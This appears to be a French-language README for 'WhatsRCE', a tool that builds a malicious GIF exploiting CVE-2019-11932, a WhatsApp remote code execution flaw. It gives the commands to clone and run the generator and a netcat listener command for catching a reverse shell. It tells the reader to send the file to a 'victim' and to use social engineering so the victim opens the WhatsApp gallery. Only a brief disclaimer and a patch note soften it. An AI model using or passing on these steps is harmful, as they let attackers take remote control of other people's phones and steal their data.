WhatsRCE
Ceci est un générateur automatisé de payload pour CVE-2019-11932 (Exécution de code à distance sur WhatsApp)
- Installation automatique de GCC (commande inoffensive, vous pouvez voir que c'est open-source)
- Sauvegarde dans un fichier .GIF
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
- Envoyez simplement le fichier .GIF à la victime EN TANT QUE DOCUMENT, PAS COMME IMAGE
- Et configurez nc / netcat sur le port que vous avez défini dans l'outil WhatsRCE {nc -lnvp votre_port}
- Vous pouvez utiliser une attaque d'ingénierie sociale pour que la victime soit attirée à lancer cet exploit
- Dites à la victime d'ouvrir la galerie via WhatsApp et demandez-lui d'envoyer une photo (pas nécessaire, il suffit d'accéder à la galerie, aucun problème) ; quelques secondes plus tard, vous recevrez une connexion shell de la victime
ou regardez cette vidéo
VIDÉO DE DÉMO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
si le lien ci-dessus n'est pas accessible
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
- Mettez à jour votre WhatsApp vers la dernière version (Corrigé dans la version 2.19.244)
- Comment recevoir tout fichier, y compris audio, images et autres, de personnes que nous ne connaissons pas
Ceci est uniquement pour l'apprentissage ; les conséquences, etc., si vous l'utilisez pour un crime, je n'en suis pas responsable !